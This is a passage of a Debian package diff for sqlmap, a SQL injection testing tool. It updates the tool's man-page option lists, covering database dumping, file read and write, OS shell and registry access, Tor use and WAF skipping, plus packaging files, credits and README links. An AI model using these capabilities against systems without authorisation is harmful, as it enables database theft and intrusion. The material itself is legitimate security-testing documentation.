.TP \fB\-h\fR, \fB\-\-help\fR @@ -18,24 +31,19 @@ .TP \fB\-v\fR VERBOSE Verbosity level: 0\-6 (default 1) -.IP -Target: -.IP -At least one of these options has to be provided to define the -target(s) -.TP -\fB\-d\fR DIRECT -Connection string for direct database connection +.SS Target: +.PP +At least one of these options has to be provided to define the target(s) .TP \fB\-u\fR URL, \fB\-\-url\fR=\fI\,URL\/\fR Target URL (e.g. "http://www.site.com/vuln.php?id=1") .TP +\fB\-d\fR DIRECT +Connection string for direct database connection +.TP \fB\-l\fR LOGFILE Parse target(s) from Burp or WebScarab proxy log file .TP -\fB\-x\fR SITEMAPURL -Parse target(s) from remote sitemap(.xml) file -.TP \fB\-m\fR BULKFILE Scan multiple targets given in a textual file .TP @@ -48,24 +56,33 @@ \fB\-c\fR CONFIGFILE Load options from a configuration INI file .IP -Request: -.IP +.SS Request: +.PP These options can be used to specify how to connect to the target URL .TP +\fB\-A\fR AGENT, \fB\-\-user\fR.. +HTTP User\-Agent header value +.TP +\fB\-H\fR HEADER, \fB\-\-hea\fR.. +Extra header (e.g. "X\-Forwarded\-For: 127.0.0.1") +.TP \fB\-\-method\fR=\fI\,METHOD\/\fR Force usage of given HTTP method (e.g. PUT) .TP \fB\-\-data\fR=\fI\,DATA\/\fR -Data string to be sent through POST +Data string to be sent through POST (e.g. "id=1") .TP \fB\-\-param\-del\fR=\fI\,PARA\/\fR.. -Character used for splitting parameter values +Character used for splitting parameter values (e.g. &) .TP \fB\-\-cookie\fR=\fI\,COOKIE\/\fR -HTTP Cookie header value +HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..") .TP \fB\-\-cookie\-del\fR=\fI\,COO\/\fR.. -Character used for splitting cookie values +Character used for splitting cookie values (e.g. ;) +.TP +\fB\-\-live\-cookies\fR=\fI\,L\/\fR.. +Live cookies file used for loading up\-to\-date values .TP \fB\-\-load\-cookies\fR=\fI\,L\/\fR.. File containing cookies in Netscape/wget format @@ -73,8 +90,8 @@ \fB\-\-drop\-set\-cookie\fR Ignore Set\-Cookie header from response .TP -\fB\-\-user\-agent\fR=\fI\,AGENT\/\fR -HTTP User\-Agent header value +\fB\-\-mobile\fR +Imitate smartphone through HTTP User\-Agent header .TP \fB\-\-random\-agent\fR Use randomly selected HTTP User\-Agent header value @@ -85,14 +102,11 @@ \fB\-\-referer\fR=\fI\,REFERER\/\fR HTTP Referer header value .TP -\fB\-H\fR HEADER, \fB\-\-hea\fR.. -Extra header (e.g. "X\-Forwarded\-For: 127.0.0.1") -.TP \fB\-\-headers\fR=\fI\,HEADERS\/\fR Extra headers (e.g. "Accept\-Language: fr\enETag: 123") .TP \fB\-\-auth\-type\fR=\fI\,AUTH\/\fR.. -HTTP authentication type (Basic, Digest, NTLM or PKI) +HTTP authentication type (Basic, Digest, Bearer, ...) .TP \fB\-\-auth\-cred\fR=\fI\,AUTH\/\fR.. HTTP authentication credentials (name:password) @@ -100,8 +114,17 @@ \fB\-\-auth\-file\fR=\fI\,AUTH\/\fR.. HTTP authentication PEM cert/private key file .TP -\fB\-\-ignore\-401\fR -Ignore HTTP Error 401 (Unauthorized) +\fB\-\-ignore\-code\fR=\fI\,IG\/\fR.. +Ignore (problematic) HTTP error code (e.g. 401) +.TP +\fB\-\-ignore\-proxy\fR +Ignore system default proxy settings +.TP +\fB\-\-ignore\-redirects\fR +Ignore redirection attempts +.TP +\fB\-\-ignore\-timeouts\fR +Ignore connection timeouts .TP \fB\-\-proxy\fR=\fI\,PROXY\/\fR Use a proxy to connect to the target URL @@ -112,8 +135,8 @@ \fB\-\-proxy\-file\fR=\fI\,PRO\/\fR.. Load proxy list from a file .TP -\fB\-\-ignore\-proxy\fR -Ignore system default proxy settings +\fB\-\-proxy\-freq\fR=\fI\,PRO\/\fR.. +Requests between change of proxy from a given list .TP \fB\-\-tor\fR Use Tor anonymity network @@ -122,7 +145,7 @@ Set Tor proxy port other than default .TP \fB\-\-tor\-type\fR=\fI\,TORTYPE\/\fR -Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) +Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default)) .TP \fB\-\-check\-tor\fR Check to see if Tor is used properly @@ -136,6 +159,9 @@ \fB\-\-retries\fR=\fI\,RETRIES\/\fR Retries when the connection timeouts (default 3) .TP +\fB\-\-retry\-on\fR=\fI\,RETRYON\/\fR +Retry request on regexp matching content (e.g. "drop") +.TP \fB\-\-randomize\fR=\fI\,RPARAM\/\fR Randomly change value for given parameter(s) .TP @@ -149,7 +175,7 @@ Load safe HTTP request from a file .TP \fB\-\-safe\-freq\fR=\fI\,SAFE\/\fR.. -Test requests between two visits to a given safe URL +Regular requests between visits to a safe URL .TP \fB\-\-skip\-urlencode\fR Skip URL encoding of payload data @@ -158,20 +184,28 @@ Parameter used to hold anti\-CSRF token .TP \fB\-\-csrf\-url\fR=\fI\,CSRFURL\/\fR -URL address to visit to extract anti\-CSRF token +URL address to visit for extraction of anti\-CSRF token +.TP +\fB\-\-csrf\-method\fR=\fI\,CS\/\fR.. +HTTP method to use during anti\-CSRF token page visit +.TP +\fB\-\-csrf\-retries\fR=\fI\,C\/\fR.. +Retries for anti\-CSRF token retrieval (default 0) .TP \fB\-\-force\-ssl\fR Force usage of SSL/HTTPS .TP +\fB\-\-chunked\fR +Use HTTP chunked transfer encoded (POST) requests +.TP \fB\-\-hpp\fR Use HTTP parameter pollution method .TP \fB\-\-eval\fR=\fI\,EVALCODE\/\fR -Evaluate provided Python code before the request (e.g. -"import hashlib;id2=hashlib.md5(id).hexdigest()") -.IP -Optimization: +Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") .IP +.SS Optimization: +.PP These options can be used to optimize the performance of sqlmap .TP \fB\-o\fR @@ -189,10 +223,9 @@ \fB\-\-threads\fR=\fI\,THREADS\/\fR Max number of concurrent HTTP(s) requests (default 1) .IP -Injection: -.IP -These options can be used to specify which parameters to test for, -provide custom injection payloads and optional tampering scripts +.SS Injection: +.PP +These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts .TP \fB\-p\fR TESTPARAMETER Testable parameter(s) @@ -201,16 +234,22 @@ Skip testing for given parameter(s) .TP \fB\-\-skip\-static\fR -Skip testing parameters that not appear dynamic +Skip testing parameters that not appear to be dynamic +.TP +\fB\-\-param\-exclude=\fR.. +Regexp to exclude parameters from testing (e.g. "ses") +.TP +\fB\-\-param\-filter\fR=\fI\,P\/\fR.. +Select testable parameter(s) by place (e.g. "POST") .TP \fB\-\-dbms\fR=\fI\,DBMS\/\fR -Force back\-end DBMS to this value +Force back\-end DBMS to provided value .TP \fB\-\-dbms\-cred\fR=\fI\,DBMS\/\fR.. DBMS authentication credentials (user:password) .TP \fB\-\-os\fR=\fI\,OS\/\fR -Force back\-end DBMS operating system to this value +Force back\-end DBMS operating system to provided value .TP \fB\-\-invalid\-bignum\fR Use big numbers for invalidating values @@ -236,8 +275,8 @@ \fB\-\-tamper\fR=\fI\,TAMPER\/\fR Use given script(s) for tampering injection data .IP -Detection: -.IP +.SS Detection: +.PP These options can be used to customize the detection phase .TP \fB\-\-level\fR=\fI\,LEVEL\/\fR @@ -258,18 +297,20 @@ \fB\-\-code\fR=\fI\,CODE\/\fR HTTP code to match when query is evaluated to True .TP +\fB\-\-smart\fR +Perform thorough tests only if positive heuristic(s) +.TP \fB\-\-text\-only\fR Compare pages based only on the textual content .TP \fB\-\-titles\fR Compare pages based only on their titles .IP -Techniques: -.IP -These options can be used to tweak testing of specific SQL injection -techniques +.SS Techniques: +.PP +These options can be used to tweak testing of specific SQL injection techniques .TP -\fB\-\-technique\fR=\fI\,TECH\/\fR +\fB\-\-technique\fR=\fI\,TECH\/\fR.. SQL injection techniques to use (default "BEUSTQ") .TP \fB\-\-time\-sec\fR=\fI\,TIMESEC\/\fR @@ -287,19 +328,20 @@ \fB\-\-dns\-domain\fR=\fI\,DNS\/\fR.. Domain name used for DNS exfiltration attack .TP -\fB\-\-second\-order\fR=\fI\,S\/\fR.. +\fB\-\-second\-url\fR=\fI\,SEC\/\fR.. Resulting page URL searched for second\-order response +.TP +\fB\-\-second\-req\fR=\fI\,SEC\/\fR.. +Load second\-order HTTP request from file .IP -Fingerprint: +.SS Fingerprint: .TP \fB\-f\fR, \fB\-\-fingerprint\fR Perform an extensive DBMS version fingerprint .IP -Enumeration: -.IP -These options can be used to enumerate the back\-end database -management system information, structure and data contained in the -tables. Moreover you can run your own SQL statements +.SS Enumeration: +.PP +These options can be used to enumerate the back\-end database management system information, structure and data contained in the tables .TP \fB\-a\fR, \fB\-\-all\fR Retrieve everything @@ -356,7 +398,10 @@ Search column(s), table(s) and/or database name(s) .TP \fB\-\-comments\fR -Retrieve DBMS comments +Check for DBMS comments during enumeration +.TP +\fB\-\-statements\fR +Retrieve SQL statements being run on DBMS .TP \fB\-D\fR DB DBMS database to enumerate @@ -367,8 +412,8 @@ \fB\-C\fR COL DBMS database table column(s) to enumerate .TP -\fB\-X\fR EXCLUDECOL -DBMS database table column(s) to not enumerate +\fB\-X\fR EXCLUDE +DBMS database identifier(s) to not enumerate .TP \fB\-U\fR USER DBMS user to enumerate @@ -376,14 +421,17 @@ \fB\-\-exclude\-sysdbs\fR Exclude DBMS system databases when enumerating tables .TP +\fB\-\-pivot\-column\fR=\fI\,P\/\fR.. +Pivot column name +.TP \fB\-\-where\fR=\fI\,DUMPWHERE\/\fR Use WHERE condition while table dumping .TP \fB\-\-start\fR=\fI\,LIMITSTART\/\fR -First query output entry to retrieve +First dump table entry to retrieve .TP \fB\-\-stop\fR=\fI\,LIMITSTOP\/\fR -Last query output entry to retrieve +Last dump table entry to retrieve .TP \fB\-\-first\fR=\fI\,FIRSTCHAR\/\fR First query output word character to retrieve @@ -391,7 +439,7 @@ \fB\-\-last\fR=\fI\,LASTCHAR\/\fR Last query output word character to retrieve .TP -\fB\-\-sql\-query\fR=\fI\,QUERY\/\fR +\fB\-\-sql\-query\fR=\fI\,SQLQ\/\fR.. SQL statement to be executed .TP \fB\-\-sql\-shell\fR @@ -400,8 +448,8 @@ \fB\-\-sql\-file\fR=\fI\,SQLFILE\/\fR Execute SQL statements from given file(s) .IP -Brute force: -.IP +.SS Brute force: +.PP These options can be used to run brute force checks .TP \fB\-\-common\-tables\fR @@ -409,9 +457,12 @@ .TP \fB\-\-common\-columns\fR Check existence of common columns +.TP +\fB\-\-common\-files\fR +Check existence of common files .IP -User\-defined function injection: -.IP +.SS User\-defined function injection: +.PP These options can be used to create custom user\-defined functions .TP \fB\-\-udf\-inject\fR @@ -420,22 +471,22 @@ \fB\-\-shared\-lib\fR=\fI\,SHLIB\/\fR Local path of the shared library .IP -File system access: -.IP +.SS File system access: +.PP These options can be used to access the back\-end database management system underlying file system .TP -\fB\-\-file\-read\fR=\fI\,RFILE\/\fR +\fB\-\-file\-read\fR=\fI\,FILE\/\fR.. Read a file from the back\-end DBMS file system .TP -\fB\-\-file\-write\fR=\fI\,WFILE\/\fR +\fB\-\-file\-write\fR=\fI\,FIL\/\fR.. Write a local file on the back\-end DBMS file system .TP -\fB\-\-file\-dest\fR=\fI\,DFILE\/\fR +\fB\-\-file\-dest\fR=\fI\,FILE\/\fR.. Back\-end DBMS absolute filepath to write to .IP -Operating system access: -.IP +.SS Operating system access: +.PP These options can be used to access the back\-end database management system underlying operating system .TP @@ -463,8 +514,8 @@ \fB\-\-tmp\-path\fR=\fI\,TMPPATH\/\fR Remote absolute path of temporary files directory .IP -Windows registry access: -.IP +.SS Windows registry access: +.PP These options can be used to access the back\-end database management system Windows registry .TP @@ -489,8 +540,8 @@ \fB\-\-reg\-type\fR=\fI\,REGTYPE\/\fR Windows registry key value type .IP -General: -.IP +.SS General: +.PP These options can be used to set some general working parameters .TP \fB\-s\fR SESSIONFILE @@ -499,11 +550,26 @@ \fB\-t\fR TRAFFICFILE Log all HTTP traffic into a textual file .TP +\fB\-\-answers\fR=\fI\,ANSWERS\/\fR +Set predefined answers (e.g. "quit=N,follow=N") +.TP +\fB\-\-base64\fR=\fI\,BASE64P\/\fR.. +Parameter(s) containing Base64 encoded data +.TP +\fB\-\-base64\-safe\fR +Use URL and filename safe Base64 alphabet (RFC 4648) +.TP \fB\-\-batch\fR -Never ask for user input, use the default behaviour +Never ask for user input, use the default behavior .TP -\fB\-\-charset\fR=\fI\,CHARSET\/\fR -Force character encoding used for data retrieval +\fB\-\-binary\-fields=\fR.. +Result fields having binary values (e.g. "digest") +.TP +\fB\-\-check\-internet\fR +Check Internet connection before assessing the target +.TP +\fB\-\-cleanup\fR +Clean up the DBMS from sqlmap specific UDF and tables .TP \fB\-\-crawl\fR=\fI\,CRAWLDEPTH\/\fR Crawl the website starting from the target URL @@ -514,9 +580,15 @@ \fB\-\-csv\-del\fR=\fI\,CSVDEL\/\fR Delimiting character used in CSV output (default ",") .TP +\fB\-\-charset\fR=\fI\,CHARSET\/\fR +Blind SQL injection charset (e.g. "0123456789abcdef") +.TP \fB\-\-dump\-format\fR=\fI\,DU\/\fR.. Format of dumped data (CSV (default), HTML or SQLITE) .TP +\fB\-\-encoding\fR=\fI\,ENCOD\/\fR.. +Character encoding used for data retrieval (e.g. GBK) +.TP \fB\-\-eta\fR Display for each output the estimated time of arrival .TP @@ -529,8 +601,14 @@ \fB\-\-fresh\-queries\fR Ignore query results stored in session file .TP +\fB\-\-gpage\fR=\fI\,GOOGLEPAGE\/\fR +Use Google dork results from specified page number +.TP +\fB\-\-har\fR=\fI\,HARFILE\/\fR +Log all HTTP traffic into a HAR file +.TP \fB\-\-hex\fR -Use DBMS hex function(s) for data retrieval +Use hex conversion during data retrieval .TP \fB\-\-output\-dir\fR=\fI\,OUT\/\fR.. Custom output directory path @@ -538,14 +616,29 @@ \fB\-\-parse\-errors\fR Parse and display DBMS error messages from responses .TP -\fB\-\-pivot\-column\fR=\fI\,P\/\fR.. -Pivot column name +\fB\-\-preprocess\fR=\fI\,PRE\/\fR.. +Use given script(s) for preprocessing (request) +.TP +\fB\-\-postprocess\fR=\fI\,PO\/\fR.. +Use given script(s) for postprocessing (response) +.TP +\fB\-\-repair\fR +Redump entries having unknown character marker (?) .TP \fB\-\-save\fR=\fI\,SAVECONFIG\/\fR Save options to a configuration INI file .TP \fB\-\-scope\fR=\fI\,SCOPE\/\fR -Regexp to filter targets from provided proxy log +Regexp for filtering targets +.TP +\fB\-\-skip\-heuristics\fR +Skip heuristic detection of vulnerabilities +.TP +\fB\-\-skip\-waf\fR +Skip heuristic detection of WAF/IPS protection +.TP +\fB\-\-table\-prefix\fR=\fI\,T\/\fR.. +Prefix used for temporary tables (default: "sqlmap") .TP \fB\-\-test\-filter\fR=\fI\,TE\/\fR.. Select tests by payloads and/or titles (e.g. ROW) @@ -553,10 +646,12 @@ \fB\-\-test\-skip\fR=\fI\,TEST\/\fR.. Skip tests by payloads and/or titles (e.g. BENCHMARK) .TP -\fB\-\-update\fR -Update sqlmap +\fB\-\-web\-root\fR=\fI\,WEBROOT\/\fR +Web server document root directory (e.g. "/var/www") .IP -Miscellaneous: +.SS Miscellaneous: +.PP +These options do not fit into any other category .TP \fB\-z\fR MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") @@ -564,47 +659,38 @@ \fB\-\-alert\fR=\fI\,ALERT\/\fR Run host OS command(s) when SQL injection is found .TP -\fB\-\-answers\fR=\fI\,ANSWERS\/\fR -Set question answers (e.g. "quit=N,follow=N") -.TP \fB\-\-beep\fR -Beep on question and/or when SQL injection is found -.TP -\fB\-\-cleanup\fR -Clean up the DBMS from sqlmap specific UDF and tables +Beep on question and/or when vulnerability is found .TP \fB\-\-dependencies\fR -Check for missing (non\-core) sqlmap dependencies +Check for missing (optional) sqlmap dependencies .TP \fB\-\-disable\-coloring\fR Disable console output coloring .TP -\fB\-\-gpage\fR=\fI\,GOOGLEPAGE\/\fR -Use Google dork results from specified page number -.TP -\fB\-\-identify\-waf\fR -Make a thorough testing for a WAF/IPS/IDS protection -.TP -\fB\-\-skip\-waf\fR -Skip heuristic detection of WAF/IPS/IDS protection -.TP -\fB\-\-mobile\fR -Imitate smartphone through HTTP User\-Agent header +\fB\-\-list\-tampers\fR +Display list of available tamper scripts .TP \fB\-\-offline\fR Work in offline mode (only use session data) .TP -\fB\-\-page\-rank\fR -Display page rank (PR) for Google dork results -.TP -\fB\-\-purge\-output\fR -Safely remove all content from output directory +\fB\-\-purge\fR +Safely remove all content from sqlmap data directory .TP -\fB\-\-smart\fR -Conduct thorough tests only if positive heuristic(s) +\fB\-\-results\-file\fR=\fI\,R\/\fR.. +Location of CSV results file in multiple targets mode .TP -\fB\-\-sqlmap\-shell\fR +\fB\-\-shell\fR Prompt for an interactive sqlmap shell .TP +\fB\-\-tmp\-dir\fR=\fI\,TMPDIR\/\fR +Local directory for storing temporary files +.TP +\fB\-\-unstable\fR +Adjust options for unstable connections +.TP +\fB\-\-update\fR +Update sqlmap +.TP \fB\-\-wizard\fR -Simple wizard interface for beginner users +Simple wizard interface for beginner users \ No newline at end of file diff -Nru sqlmap-1.4.4/debian/man/sqlmapapi.1 sqlmap-1.5.11.5/debian/man/sqlmapapi.1 --- sqlmap-1.4.4/debian/man/sqlmapapi.1 2019-01-15 08:58:40.000000000 +0000 +++ sqlmap-1.5.11.5/debian/man/sqlmapapi.1 2021-11-12 18:29:28.000000000 +0000 @@ -1,9 +1,8 @@ -.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.46.5. -.TH SQLMAPAPI.PY "1" "June 2015" "sqlmapapi.py v0.9" "User Commands" +.TH SQLMAPAPI "1" "November 2021" "sqlmapapi 1.5.11.5" "User Commands" .SH NAME -sqlmapapi.py \- automatic SQL injection tool, api server +sqlmapapi \- automatic SQL injection tool, api server .SH SYNOPSIS -.B sqlmapapi.py +.B sqlmapapi [\fI\,options\/\fR] .SH OPTIONS .TP @@ -11,13 +10,22 @@ show this help message and exit .TP \fB\-s\fR, \fB\-\-server\fR -Act as a REST\-JSON API server +Run as a REST\-JSON API server .TP \fB\-c\fR, \fB\-\-client\fR -Act as a REST\-JSON API client +Run as a REST\-JSON API client .TP \fB\-H\fR HOST, \fB\-\-host\fR=\fI\,HOST\/\fR -Host of the REST\-JSON API server +Host of the REST\-JSON API server (default "127.0.0.1") .TP \fB\-p\fR PORT, \fB\-\-port\fR=\fI\,PORT\/\fR -Port of the the REST\-JSON API server +Port of the the REST\-JSON API server (default 8775) +.TP +\fB\-\-adapter\fR=\fI\,ADAPTER\/\fR +Server (bottle) adapter to use (default "wsgiref") +.TP +\fB\-\-username\fR=\fI\,USERNAME\/\fR +Basic authentication username (optional) +.TP +\fB\-\-password\fR=\fI\,PASSWORD\/\fR +Basic authentication password (optional) \ No newline at end of file diff -Nru sqlmap-1.4.4/debian/source/lintian-overrides sqlmap-1.5.11.5/debian/source/lintian-overrides --- sqlmap-1.4.4/debian/source/lintian-overrides 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/debian/source/lintian-overrides 2020-08-10 06:00:49.000000000 +0000 @@ -0,0 +1 @@ +sqlmap source: source-is-missing data/html/index.html line length is 1079 characters (>512) diff -Nru sqlmap-1.4.4/debian/sqlmap.lintian-overrides sqlmap-1.5.11.5/debian/sqlmap.lintian-overrides --- sqlmap-1.4.4/debian/sqlmap.lintian-overrides 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/debian/sqlmap.lintian-overrides 2020-05-16 15:01:10.000000000 +0000 @@ -0,0 +1,3 @@ +sqlmap: privacy-breach-uses-embedded-file usr/share/sqlmap/data/html/index.html You may use the libjs-bootstrap package. (https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css) +sqlmap: privacy-breach-uses-embedded-file usr/share/sqlmap/data/html/index.html You may use the libjs-jquery package. (https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js) +sqlmap: privacy-breach-uses-embedded-file usr/share/sqlmap/data/html/index.html You may use the node-html5shiv package (virtual package). (https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js) diff -Nru sqlmap-1.4.4/debian/upstream/metadata sqlmap-1.5.11.5/debian/upstream/metadata --- sqlmap-1.4.4/debian/upstream/metadata 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/debian/upstream/metadata 2020-08-01 07:22:45.000000000 +0000 @@ -0,0 +1,5 @@ +--- +Bug-Database: https://github.com/sqlmapproject/sqlmap/issues +Bug-Submit: https://github.com/sqlmapproject/sqlmap/issues/new +Repository: https://github.com/sqlmapproject/sqlmap.git +Repository-Browse: https://github.com/sqlmapproject/sqlmap diff -Nru sqlmap-1.4.4/doc/CHANGELOG.md sqlmap-1.5.11.5/doc/CHANGELOG.md --- sqlmap-1.4.4/doc/CHANGELOG.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/CHANGELOG.md 2021-11-12 18:30:56.000000000 +0000 @@ -1,3 +1,8 @@ +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + # Version 1.4 (2020-01-01) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) @@ -6,14 +11,17 @@ # Version 1.3 (2019-01-05) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1) # Version 1.2 (2018-01-08) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1) # Version 1.1 (2017-04-07) * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1) # Version 1.0 (2016-02-27) @@ -168,7 +176,7 @@ * Major code cleanup. * Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. * Updated user's manual. -* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. +* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html. # Version 0.8 release candidate (2009-09-21) @@ -340,7 +348,7 @@ * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; * Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); * Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); -* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; +* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; * Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; * Improved logging functionality: passed from banal 'print' to Python native logging library; * Added support for more than one parameter in `-p` command line option; diff -Nru sqlmap-1.4.4/doc/THANKS.md sqlmap-1.5.11.5/doc/THANKS.md --- sqlmap-1.4.4/doc/THANKS.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/THANKS.md 2021-11-12 18:30:56.000000000 +0000 @@ -112,6 +112,9 @@ Sherif El-Deeb, * for reporting a minor bug +Thomas Etrillard, +* for contributing the IBM DB2 error-based payloads (RAISE_ERROR) + Stefano Di Paola, * for suggesting good features @@ -148,11 +151,6 @@ Kasper Fons, * for reporting several bugs -Jose Fonseca, -* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only - http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - http://code.google.com/p/jrfonseca/wiki/XDot - Alan Franzoni, * for helping out with Python subprocess library @@ -317,6 +315,9 @@ Vinícius Henrique Marangoni, * for contributing a Portuguese translation of README.md +Francesco Marano, +* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload + Ahmad Maulana, * for contributing a tamper script halfversionedmorekeywords.py @@ -486,6 +487,9 @@ Philippe A. R. Schaeffer, * for reporting a minor bug +Henri Salo +* for a donation + Mohd Zamiri Sanin, * for reporting a minor bug @@ -730,6 +734,9 @@ Rub3nCT, * for reporting a minor bug +sapra, +* for helping out with Python multiprocessing library on MacOS + shiftzwei, * for reporting a couple of bugs diff -Nru sqlmap-1.4.4/doc/THIRD-PARTY.md sqlmap-1.5.11.5/doc/THIRD-PARTY.md --- sqlmap-1.4.4/doc/THIRD-PARTY.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/THIRD-PARTY.md 2021-11-12 18:30:56.000000000 +0000 @@ -48,14 +48,10 @@ * The `Chardet` library located under `thirdparty/chardet/`. Copyright (C) 2008, Mark Pilgrim. -* The `Gprof2dot` library located under `thirdparty/gprof2dot/`. - Copyright (C) 2008-2009, Jose Fonseca. * The `KeepAlive` library located under `thirdparty/keepalive/`. Copyright (C) 2002-2003, Michael D. Stenner. * The `MultipartPost` library located under `thirdparty/multipart/`. Copyright (C) 2006, Will Holcomb. -* The `XDot` library located under `thirdparty/xdot/` - Copyright (C) 2008, Jose Fonseca. * The `icmpsh` tool located under `extra/icmpsh/`. Copyright (C) 2010, Nico Leidecker, Bernardo Damele. @@ -277,7 +273,7 @@ * The `bottle` web framework library located under `thirdparty/bottle/`. Copyright (C) 2012, Marcel Hellkamp. * The `identYwaf` library located under `thirdparty/identywaf/`. - Copyright (C) 2019, Miroslav Stampar. + Copyright (C) 2019-2020, Miroslav Stampar. * The `ordereddict` library located under `thirdparty/odict/`. Copyright (C) 2009, Raymond Hettinger. * The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`. diff -Nru sqlmap-1.4.4/doc/translations/README-bg-BG.md sqlmap-1.5.11.5/doc/translations/README-bg-BG.md --- sqlmap-1.4.4/doc/translations/README-bg-BG.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-bg-BG.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. +sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи. Използване ---- @@ -39,12 +39,12 @@ Връзки ---- -* Начална страница: http://sqlmap.org +* Начална страница: https://sqlmap.org * Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues * Упътване: https://github.com/sqlmapproject/sqlmap/wiki * Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-de-GER.md sqlmap-1.5.11.5/doc/translations/README-de-GER.md --- sqlmap-1.4.4/doc/translations/README-de-GER.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-de-GER.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funktioniert sofort mit den [Python](http://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. Benutzung --- @@ -38,12 +38,12 @@ Links --- -* Webseite: http://sqlmap.org +* Webseite: https://sqlmap.org * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues * Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki * Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrationen: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-es-MX.md sqlmap-1.5.11.5/doc/translations/README-es-MX.md --- sqlmap-1.4.4/doc/translations/README-es-MX.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-es-MX.md 2021-11-12 18:30:56.000000000 +0000 @@ -19,7 +19,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma. Uso --- @@ -38,12 +38,12 @@ Enlaces --- -* Página principal: http://sqlmap.org +* Página principal: 